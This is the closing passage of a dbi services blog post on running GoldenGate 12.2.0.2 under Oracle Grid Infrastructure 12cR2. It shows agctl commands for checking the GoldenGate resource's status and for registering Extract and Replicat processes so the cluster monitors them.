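[oracle@rac001 ~]$ $XAG_HOME/bin/agctl status goldengate GGAPP01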

We can also add Extract and Replicat processes as cluster resources, but in this case they will only be monitored by the cluster, which will update their states to ONLINE, OFFLINE, INTERMEDIATE or UNKNOWN depending on the scenario, as sketched below.
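A sketch of what such a registration could look like (the --monitor_extracts and --monitor_replicats options are an assumption based on the XAG documentation, and EXT1/REP1 are placeholder process names):

[oracle@rac001 ~]$ $XAG_HOME/bin/agctl modify goldengate GGAPP01 --monitor_extracts EXT1 --monitor_replicats REP1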

I hope this helps; please do not hesitate to contact us if you have any questions or require further information.

 

The post GoldenGate 12.2.0.2 installation in a Grid Infrastructure 12cR2 appeared first on the dbi services blog.
